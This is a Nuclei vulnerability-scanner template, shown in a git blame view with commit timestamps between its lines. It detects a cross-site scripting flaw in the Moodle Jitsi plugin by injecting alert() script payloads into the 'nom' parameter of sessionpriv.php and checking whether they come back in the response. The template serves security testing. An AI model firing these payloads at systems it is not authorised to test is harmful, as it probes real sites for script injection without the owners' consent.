nuclei-templates/vulnerabilities/moodle/moodle-jitsi-plugin-xss.yaml

27 lines
750 B
YAML
Raw Normal View History

2021-03-06 18:25:44 +00:00
info:
name: moodle jitsi plugin XSS
author: aceseven (digisec360)
description: Cross-site Scripting in moodle jitsi plugin
severity: critical
tags: moodle,jitsi,xss
requests:
- payloads:
2021-03-07 08:13:48 +00:00
fuzz:
2021-03-06 18:25:44 +00:00
- test_user');alert(1);//
- test');alert(document.domain);//
2021-03-07 08:13:48 +00:00
2021-03-07 08:18:33 +00:00
raw:
2021-03-06 18:25:44 +00:00
- |
GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Ftargetdomain.com&nom=§fuzz§&ses=test_user&t=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: */*
Referer: {{BaseURL}}
Connection: keep-alive
2021-03-07 08:13:48 +00:00
2021-03-06 18:25:44 +00:00
matchers:
2021-03-07 08:18:33 +00:00
- type: word
2021-03-07 08:58:07 +00:00
words:
2021-03-07 08:18:33 +00:00
- "alert(1);"
- "alert(document.domain);"